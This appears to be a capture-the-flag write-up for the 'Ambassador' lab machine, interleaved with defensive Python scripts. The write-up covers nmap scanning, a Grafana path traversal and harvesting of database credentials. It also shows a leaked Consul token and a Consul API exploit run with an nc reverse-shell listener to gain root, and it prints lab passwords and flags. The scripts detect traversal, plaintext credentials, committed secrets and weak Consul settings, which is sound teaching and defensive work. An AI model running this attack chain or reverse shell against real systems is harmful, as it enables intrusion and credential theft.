Ambassador
nmap initial SYN scan shows 4 open ports
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
3306/tcp open mysql

full tcp nmap scan to see any other open ports shows 2 more ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
3306/tcp open mysql
39455/tcp filtered unknown
49407/tcp filtered unknown

nmap scan with default scripts and version detection on the found ports `sudo nmap -sS -sC -sV -p 22,80,3000,3306,39455,49407` shows
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
| 256 80:a4:c5:2e:9a:b1:ec:da:27:64:39:a4:08:97:3b:ef (ECDSA)
|_ 256 f5:90:ba:7d:ed:55:cb:70:07:f2:bb:c8:91:93:1b:f6 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Ambassador Development Server
3000/tcp open ppp?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fn22t%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 07 Jan 2023 12:57:51 GMT
| Content-Length: 29
| href="/login">Found.
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 07 Jan 2023 12:57:10 GMT
| Content-Length: 29
| href="/login">Found.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 07 Jan 2023 12:57:17 GMT
| Content-Length: 0
3306/tcp open mysql MySQL 8.0.30-0ubuntu0.20.04.2
|_mysql-info: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

added ambassador.htb to /etc/hosts
host:80 running Hugo 0.94.2
host:3000 running grafana v8.2.0 (grafana v8.2.0 is vulnerable to path traversal)
extracted defaults.ini & grafana.db config through path traversal
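From the defender's side, the traversal used above is easy to spot in the web server's access log once the request path is fully percent-decoded. The following checker is an added example, not code from the write-up: it decodes the path repeatedly (so double-encoded `..` such as `%252e%252e` is caught), walks the `.` and `..` segments and reports any request that climbs above the document root. The log lines and IP addresses are constructed for the demo and the Apache/nginx combined log format is assumed.

```python
"""Flag HTTP request paths that escape the web root after percent-decoding.

Added example (not from the write-up). Log lines below are constructed; the
combined access-log format is assumed.
"""
import re
from urllib.parse import unquote

# Combined log format: we only need the request line; group 'path' is the URL.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(path: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded to avoid loops)."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_root(path: str) -> bool:
    """True if the decoded path's '..' segments climb above '/'."""
    path = fully_decode(path.split("?", 1)[0])
    depth = 0
    # treat backslash as a separator too; some servers normalise it to '/'
    for seg in re.split(r"[\\/]+", path):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def find_traversal(log_text: str) -> list[dict]:
    """Return one finding per log line whose request path escapes the root."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if escapes_root(m["path"]):
            hits.append({"ip": m["ip"], "path": m["path"], "status": m["status"]})
    return hits


# Constructed sample log: two benign requests, two traversal attempts
# (one plain, one double-encoded), and one '..' that stays inside the root.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jan/2023:12:57:10 +0000] "GET /login HTTP/1.1" 200 1234
10.0.0.5 - - [07/Jan/2023:12:57:11 +0000] "GET /static/img/logo.png HTTP/1.1" 200 5120
10.0.0.9 - - [07/Jan/2023:12:58:02 +0000] "GET /static/css/../../../../etc/passwd HTTP/1.1" 200 2048
10.0.0.9 - - [07/Jan/2023:12:58:03 +0000] "GET /static/%252e%252e/%252e%252e/%252e%252e/etc/hosts HTTP/1.1" 200 300
10.0.0.7 - - [07/Jan/2023:12:59:00 +0000] "GET /docs/../index.html HTTP/1.1" 200 800
"""

if __name__ == "__main__":
    for h in find_traversal(SAMPLE_LOG):
        print(f"traversal from {h['ip']}: {h['path']} -> HTTP {h['status']}")
```

A 200 response on a flagged line (rather than a 400/404) is the signal that the server actually served the file, which is what makes a version such as the one found here worth patching rather than just filtering.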
we can now use sqlite3 to read grafana.db file `sqlite3 grafana.db`
`.tables` to see tables in db
sqlite> select * from user;
1|0|admin|admin@localhost||dad0e56900c3be93ce114804726f78c91e82a0f0f0f6b248da419a0cac6157e02806498f1f784146715caee5bad1506ab069|0X27trve2u|f960YdtaMF||1|1|0||2022-03-13 20:26:45|2022-09-01 22:39:38|0|2022-09-14 16:44:19|0
sqlite> select * from data_source;
2|1|1|mysql|mysql.yaml|proxy||dontStandSoCloseToMe63221!|grafana|grafana|0|||0|{}|2022-09-01 22:43:03|2023-01-07 12:46:49|0|{}|1|uKewFgM4z
we see a plain password for mysql for the user grafana
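The reason the MySQL password is readable is that it sits in the legacy plaintext `password` column of Grafana's `data_source` table rather than in the encrypted `secure_json_data` blob that newer Grafana versions use. The script below is an added example (not from the write-up) that an administrator can run against a `grafana.db` to list every data source still carrying plaintext credentials so they can be migrated. It uses only a subset of the `data_source` columns, which is assumed to match the Grafana 8 schema; the rows it builds in memory are constructed for the demo and contain no real credentials.

```python
"""Audit a grafana.db for data-source credentials stored in the clear.

Added example, not part of the write-up. Column subset assumed from the
Grafana 8 `data_source` schema; sample rows are constructed.
"""
import sqlite3

# Minimal subset of Grafana's data_source table (assumed schema).
SCHEMA = """
CREATE TABLE data_source (
    id INTEGER PRIMARY KEY, org_id INTEGER, type TEXT, name TEXT,
    user TEXT, password TEXT, basic_auth_user TEXT, basic_auth_password TEXT,
    secure_json_data TEXT
);
"""

# Constructed rows: one legacy plaintext entry, one migrated to secure_json_data.
SAMPLE_ROWS = [
    (1, 1, "mysql", "mysql.yaml", "grafana", "plaintext-demo-pass", "", "", "{}"),
    (2, 1, "prometheus", "prom", "", "", "", "", '{"basicAuthPassword":"<encrypted>"}'),
]


def load_sample_db() -> sqlite3.Connection:
    """Build an in-memory database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO data_source VALUES (?,?,?,?,?,?,?,?,?)", SAMPLE_ROWS)
    return conn


def find_plaintext_credentials(conn: sqlite3.Connection) -> list[dict]:
    """Return data sources whose plaintext password columns are populated.

    The secret itself is deliberately not returned, only which field holds it.
    """
    conn.row_factory = sqlite3.Row
    rows = conn.execute(
        "SELECT id, name, type, user, password, basic_auth_password "
        "FROM data_source "
        "WHERE COALESCE(password,'') <> '' OR COALESCE(basic_auth_password,'') <> ''"
    ).fetchall()
    findings = []
    for r in rows:
        fields = [c for c in ("password", "basic_auth_password") if r[c]]
        findings.append({"id": r["id"], "name": r["name"], "type": r["type"],
                         "user": r["user"], "plaintext_fields": fields})
    return findings


def audit_file(path: str) -> list[dict]:
    """Open a real grafana.db read-only and run the same check on it."""
    conn = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    try:
        return find_plaintext_credentials(conn)
    finally:
        conn.close()


if __name__ == "__main__":
    for f in find_plaintext_credentials(load_sample_db()):
        print(f"data source {f['id']} ({f['name']}, {f['type']}, user={f['user']}): "
              f"plaintext in {f['plaintext_fields']}")
```

Run `audit_file("/var/lib/grafana/grafana.db")` on a real instance; any finding means the database file itself is a credential store and must be protected accordingly, and the data source should be re-saved so the password moves into `secure_json_data`.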
mysql -h 10.129.57.58 -u grafana --password=dontStandSoCloseToMe63221!
MySQL [sys]> show databases;
+--------------------+
| Database |
+--------------------+
| grafana |
| information_schema |
| mysql |
| performance_schema |
| sys |
| whackywidget |
+--------------------+
MySQL [sys]> use whackywidget;
MySQL [whackywidget]> show tables;
+------------------------+
| Tables_in_whackywidget |
+------------------------+
| users |
+------------------------+
MySQL [whackywidget]> select * from users;
+-----------+------------------------------------------+
| user | pass |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
pass looks base64 encoded so we'll use `base64 -d` to decode it
└─$ base64 -d password.txt
anEnglishManInNewYork027468

we can now ssh to the developer user and get the user.txt flag
cat user.txt
9aee29464b51537ee2a8ce88e1c6d46e

╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/snap/bin/lxc
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure--lqw3fdyxw(28h#0(w8_te*wm*6ppl@g!ttcpo^m-ig!qtqy!l'
we see .gitconfig in home folder
developer@ambassador:~$ cat .gitconfig
[user]
name = Developer
email = developer@ambassador.local
[safe]
directory = /opt/my-app

we find that consul is installed on the system: Consul v1.13.2
we checkout the git logs using
git log -p
and find the token bb03b43b-1d81-d62b-24b5-39540ee469b5
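Both secrets found on this box, the hardcoded Django `SECRET_KEY` and the Consul token in the git history, are the kind of thing a pre-commit hook or CI secret scan catches before they ship. The scanner below is an added example, not code from the write-up or the target's repository: it walks `git log -p` output, tracks the current commit and file, and reports added lines matching UUID-shaped tokens (the format Consul ACL tokens use), Django `SECRET_KEY` assignments and generic credential assignments. The patch text, file names and values in it are constructed placeholders.

```python
"""Scan `git log -p` output for committed secrets.

Added example (not from the write-up). The sample patch is constructed and
the token/key values in it are placeholders.
"""
import re

# (rule name, regex); the first matching rule labels the finding.
PATTERNS = [
    ("uuid_token", re.compile(
        r"\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b", re.I)),
    ("django_secret_key", re.compile(r"SECRET_KEY\s*=\s*['\"]django-insecure-")),
    ("generic_credential", re.compile(
        r"(?i)\b(password|passwd|token|secret)\b\s*[:=]\s*['\"]?[^\s'\"]{8,}")),
]


def scan_git_log(log_text: str) -> list[dict]:
    """Return findings for added ('+') lines only, with commit and file context.

    Removed lines are ignored on purpose: deleting a secret in a later commit
    does not remove it from history, so the commit that added it is what matters.
    """
    findings, commit, path = [], None, None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ b/"):
            path = line[len("+++ b/"):]
        elif line.startswith("+") and not line.startswith("+++"):
            content = line[1:]
            for name, rx in PATTERNS:
                m = rx.search(content)
                if m:
                    findings.append({"commit": commit, "file": path,
                                     "rule": name, "match": m.group(0)})
                    break  # one finding per line is enough
    return findings


# Constructed history: the second (older) commit hardcodes a token and a
# Django key; the first (newer) commit moves the token to an env variable.
SAMPLE_GIT_LOG = """\
commit bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
Author: Developer <developer@example.invalid>
Date:   Tue Jan 3 09:00:00 2023 +0000

    read token from environment instead of hardcoding it

diff --git a/scripts/deploy.sh b/scripts/deploy.sh
--- a/scripts/deploy.sh
+++ b/scripts/deploy.sh
@@ -1,2 +1,2 @@
 #!/bin/sh
-consul kv put --token 11111111-2222-3333-4444-555555555555 app/config demo
+consul kv put --token "$CONSUL_HTTP_TOKEN" app/config demo

commit aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Author: Developer <developer@example.invalid>
Date:   Mon Jan 2 10:00:00 2023 +0000

    initial deploy script and settings

diff --git a/scripts/deploy.sh b/scripts/deploy.sh
--- /dev/null
+++ b/scripts/deploy.sh
@@ -0,0 +1,2 @@
+#!/bin/sh
+consul kv put --token 11111111-2222-3333-4444-555555555555 app/config demo
diff --git a/app/settings.py b/app/settings.py
--- /dev/null
+++ b/app/settings.py
@@ -0,0 +1,2 @@
+DEBUG = True
+SECRET_KEY = 'django-insecure-placeholder-not-a-real-key'
"""

if __name__ == "__main__":
    for f in scan_git_log(SAMPLE_GIT_LOG):
        print(f"{f['commit'][:8]} {f['file']}: {f['rule']} ({f['match'][:20]}...)")
```

Feed it real output with `git log -p | python3 scan.py` (reading stdin in place of `SAMPLE_GIT_LOG`). Note that the newer commit, which removes the token, produces no finding while the older one still does: rotating the token is the only fix once it has been committed.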
we use a python exploit from github https://github.com/GatoGamer1155/Hashicorp-Consul-RCE-via-API to get a root shell: we download it to our machine, serve it with python http.server and fetch it on the victim machine
python3 exploit.py --rhost 127.0.0.1 --rport 8500 --lhost 10.10.16.10 --lport 1234 --token bb03b43b-1d81-d62b-24b5-39540ee469b5
and listen with nc on our machine `nc -lvnp 1234`
after running the script on the victim machine we get the root shell and can now get the flag
9f67114e16e88cef9ac8d8add6d0c389
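The root shell above depends on the Consul agent accepting script-based health checks through its HTTP API from a caller who holds a valid token. An agent hardened against that has script checks disabled (or restricted to local callers with the API bound to loopback) and ACLs enabled with a default-deny policy. The checker below is an added example, not part of the write-up: it reads an agent configuration in JSON form and reports the settings that together make a leaked token equivalent to command execution on the host. The option names are real Consul agent options; the two config fragments are constructed, and the script assumes they are given as top-level JSON.

```python
"""Audit a Consul agent config for script-check and ACL weaknesses.

Added example, not from the write-up. Config fragments are constructed;
option names are Consul's own, top-level JSON layout assumed.
"""
import json


def audit_consul_config(cfg: dict) -> list[str]:
    """Return a list of human-readable issues; empty means no finding."""
    issues = []
    remote_scripts = bool(cfg.get("enable_script_checks"))
    local_scripts = bool(cfg.get("enable_local_script_checks"))
    if remote_scripts:
        issues.append("enable_script_checks=true: any API caller with a valid token "
                      "can register checks that run commands on this host")
    elif local_scripts:
        issues.append("enable_local_script_checks=true: script checks accepted from "
                      "local config and localhost API; keep the HTTP API on loopback")

    acl = cfg.get("acl", {})
    if not acl.get("enabled"):
        issues.append("acl.enabled missing/false: the HTTP API accepts unauthenticated requests")
    else:
        # Consul's default for default_policy is "allow"
        policy = acl.get("default_policy", "allow")
        if policy != "deny":
            issues.append(f"acl.default_policy={policy}: requests without a matching rule are allowed")

    # addresses.http overrides client_addr for the HTTP listener; default is loopback
    http_addr = cfg.get("addresses", {}).get("http", cfg.get("client_addr", "127.0.0.1"))
    if (remote_scripts or local_scripts) and http_addr not in ("127.0.0.1", "localhost", "::1"):
        issues.append(f"HTTP API bound to {http_addr} while script checks are enabled")
    return issues


def audit_consul_config_text(text: str) -> list[str]:
    """Same check on a JSON document (e.g. the contents of /etc/consul.d/consul.json)."""
    return audit_consul_config(json.loads(text))


# Constructed fragments: the weak one reproduces the risky combination,
# the hardened one is what a reviewer would want to see instead.
WEAK = """{"server": true, "client_addr": "0.0.0.0", "enable_script_checks": true,
"acl": {"enabled": true, "default_policy": "allow"}}"""

HARDENED = """{"server": true, "client_addr": "127.0.0.1", "enable_local_script_checks": false,
"acl": {"enabled": true, "default_policy": "deny", "enable_token_persistence": true}}"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK), ("hardened", HARDENED)):
        print(f"[{label}] {audit_consul_config_text(text) or ['no issues']}")
```

Even with the hardened settings, a token committed to a git repository has to be revoked; the config only limits what a holder of that token can do with it.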